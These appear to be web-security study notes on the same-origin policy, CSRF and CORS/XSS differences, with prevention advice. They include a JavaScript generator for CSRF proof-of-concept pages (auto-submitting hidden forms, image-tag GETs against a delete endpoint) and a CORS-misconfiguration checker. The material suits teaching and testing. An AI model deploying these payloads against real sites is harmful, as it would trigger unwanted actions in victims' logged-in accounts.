# SOP and Its Quirks

### **TL;DR**

1. SOP prevents a page from *reading* responses from a different origin; it does not stop the request from being sent. A cross-origin XMLHttpRequest does not attach cookies unless `withCredentials` is set, and even then the attacker cannot read the response. -> So a plain **\<XMLHttpRequest>** is of no use for pulling data cross-site, and by default it does not carry the victim's session either.
2. If the cross-origin website has URLs that are dangerous just by being requested with a GET, this can be abused with \<img> or \<iframe> tags that embed the exploitable URL, because the browser sends cookies along with those loads (provided the cookie's SameSite attribute allows it; `SameSite=Lax`, the default in Chromium-based browsers, withholds the cookie from such embedded loads).

**Problems:**

XMLHttpRequest().send() does not include cookies on a cross-origin request unless `withCredentials` is set, and the response stays unreadable under SOP either way. A credentialed XHR can still fire a simple form-style POST cross-site, but it never shows the attacker the reply, so it gains nothing over a plain form.

\<img> or \<iframe> **does** include cookies (subject to SameSite), but the private response data is never handed to the attacker's page.

**Solution and Exploit:**

Look for URLs that have a side effect just by being requested, such as /profile/admin/1/delete.

This method allows both GET and POST requests, as seen below: a GET via an \<img> or \<iframe>, a POST via an auto-submitted \<form> whose target is a hidden \<iframe>.

![GET request with Iframe.](https://1016642613-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MLICeMp-ugVlUqxbbIS%2F-MOnK8_fpykEupOHSLCT%2F-MOnMqTHp0Q6oK2yG3GX%2Fimage.png?alt=media\&token=7071aefb-d16d-4960-9eb4-71eec6362ba2)

\*Note: A POST made this way (from a \<form>) is sent as application/x-www-form-urlencoded by default; the only alternatives are multipart/form-data and text/plain (via the form's enctype), so an endpoint that accepts only JSON cannot be hit with a plain form.
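The two page variants described above (GET via an embedded image, POST via an auto-submitted form into a hidden iframe), as a small generator for CSRF proof-of-concept pages. This is an added example, not code from the original notes or from the video; the target URL `https://target.example/profile/admin/1/delete` and the `confirm` parameter are hypothetical.

```javascript
// Added example: a small generator for CSRF proof-of-concept pages.
// Not part of the original notes; target URL and parameters are hypothetical.

// Escape values before placing them in HTML so the PoC stays well-formed
// even when a parameter value contains quotes or angle brackets.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// GET CSRF: the browser loads the image with the victim's cookies attached
// (subject to the cookie's SameSite attribute). The attacker page never sees
// the response; the server-side side effect is the point.
function getPoc(url) {
  return `<img src="${escapeHtml(url)}" width="1" height="1" alt="">`;
}

// POST CSRF: an auto-submitted form posting into a hidden iframe so the victim
// stays on the attacker page. Only the three HTML form encodings exist
// (urlencoded is the default); a JSON body cannot be sent with a plain form.
const FORM_ENCTYPES = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];

function postPoc(url, params, enctype = FORM_ENCTYPES[0]) {
  if (!FORM_ENCTYPES.includes(enctype)) {
    throw new Error(`HTML forms cannot send ${enctype}`);
  }
  const inputs = Object.entries(params)
    .map(([k, v]) => `  <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return [
    '<iframe name="sink" style="display:none"></iframe>',
    `<form id="csrf" method="POST" action="${escapeHtml(url)}" target="sink" enctype="${enctype}">`,
    inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit();</script>',
  ].join('\n');
}

// Wrap either variant in a complete page to host on the attacker's site.
function buildPocPage(method, url, params = {}) {
  const body = method.toUpperCase() === 'GET' ? getPoc(url) : postPoc(url, params);
  return `<!doctype html>\n<html><body>\n${body}\n</body></html>\n`;
}

// Usage: the delete URL from the notes, once as GET and once as POST.
console.log(buildPocPage('GET', 'https://target.example/profile/admin/1/delete'));
console.log(buildPocPage('POST', 'https://target.example/profile/admin/1/delete', { confirm: 'yes' }));
```

Save the output as an HTML file on a site you control and open it while logged in to the target; whether the cookie actually travels depends on its SameSite attribute, which is the first thing to check when the PoC silently does nothing.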

**Prevention:**

Use a CSRF token (a per-session secret embedded in the form and verified server-side). In addition, set `SameSite` on the session cookie and never let a GET request change state.

## CSRF, CORS, XSS Differences

-> A CORS misconfiguration lets the attacker *read* data, and the endpoints involved usually carry no CSRF token (they are meant to be reached cross-site) -> CSRF lets the attacker *execute* functions (without seeing the response) from a different site if they are not protected by CSRF tokens -> XSS can both execute functions and read data, so a CSRF token doesn't matter: the injected script runs same-origin and can read the token out of the page -> BUT a *reflected* XSS in a parameter that only arrives through a CSRF-protected POST cannot be triggered cross-site, because the attacker cannot supply a valid token.

* CORS will only allow reading responses from endpoints that answer with \`Access-Control-Allow-Origin: <requesting site>\` (and, for cookie-bearing requests, \`Access-Control-Allow-Credentials: true\`)
* XSS only needs one hole, and can then act as the user across the whole site and read the response from every URL, since its requests come from the same origin
* CSRF needs every function to be vulnerable (missing or unchecked CSRF token) individually
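The decision the browser takes before page script may read a cross-origin response, as an added example (not from the original notes or the video). It models only the headers that decide readability; the preflight for non-simple requests is left out, and the origins `https://attacker.example`, `https://api.target.example` and `https://app.target.example` are hypothetical. The constructed `reflectingServer` is the classic misconfiguration that turns an authenticated endpoint into readable data for an attacker page.

```javascript
// Added example, not part of the original notes: the check a browser performs
// before page script may read a cross-origin response. Simplified model: only
// the headers that decide readability are considered, and the preflight for
// non-simple requests is not modelled. Origins are hypothetical.
function canReadCrossOriginResponse(requestOrigin, targetOrigin, withCredentials, headers) {
  if (requestOrigin === targetOrigin) {
    return { readable: true, reason: 'same origin, SOP does not apply' };
  }
  const acao = headers['access-control-allow-origin'];
  const acac = headers['access-control-allow-credentials'];
  if (acao === undefined) {
    return { readable: false, reason: 'no Access-Control-Allow-Origin: SOP blocks the read' };
  }
  if (!withCredentials) {
    // Anonymous request: the server may open it to everyone or to this origin.
    if (acao === '*' || acao === requestOrigin) {
      return { readable: true, reason: 'anonymous read allowed' };
    }
    return { readable: false, reason: `ACAO ${acao} does not match ${requestOrigin}` };
  }
  // Cookie-bearing request: a wildcard is rejected outright, the origin must
  // match exactly, and Access-Control-Allow-Credentials must be literally "true".
  if (acao === '*') {
    return { readable: false, reason: 'wildcard ACAO is not honoured with credentials' };
  }
  if (acao !== requestOrigin) {
    return { readable: false, reason: `ACAO ${acao} does not match ${requestOrigin}` };
  }
  if (acac !== 'true') {
    return { readable: false, reason: 'Access-Control-Allow-Credentials missing' };
  }
  return { readable: true, reason: 'credentialed read allowed: private data is exposed' };
}

// Two constructed server behaviours. The first reflects any Origin and allows
// credentials: the classic CORS misconfiguration that lets an attacker page
// read authenticated responses. The second only trusts a fixed allow-list.
function reflectingServer(requestOrigin) {
  return {
    'access-control-allow-origin': requestOrigin,
    'access-control-allow-credentials': 'true',
  };
}

function strictServer(requestOrigin) {
  const allowed = ['https://app.target.example'];
  return allowed.includes(requestOrigin)
    ? { 'access-control-allow-origin': requestOrigin, 'access-control-allow-credentials': 'true', vary: 'Origin' }
    : {};
}

// Usage: the attacker's page issues a credentialed request to the API.
function compare() {
  const attacker = 'https://attacker.example';
  const api = 'https://api.target.example';
  return {
    reflecting: canReadCrossOriginResponse(attacker, api, true, reflectingServer(attacker)),
    strict: canReadCrossOriginResponse(attacker, api, true, strictServer(attacker)),
    wildcardWithCookies: canReadCrossOriginResponse(attacker, api, true, { 'access-control-allow-origin': '*' }),
  };
}

console.log(compare());
```

When testing a target, send the same request twice, once with a foreign `Origin` header and once without, and compare the two headers above; an origin echoed back together with `Access-Control-Allow-Credentials: true` is the case the first bullet describes.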

### **Reference:**

If this doesn't make sense to you, just go watch LiveOverflow's video below; I took these notes mostly from this video anyway :)

**LiveOverflow \[** [CSRF Introduction and what is the Same-Origin Policy? - web 0x04](https://www.youtube.com/watch?v=KaEj_qZgiKY) **]**
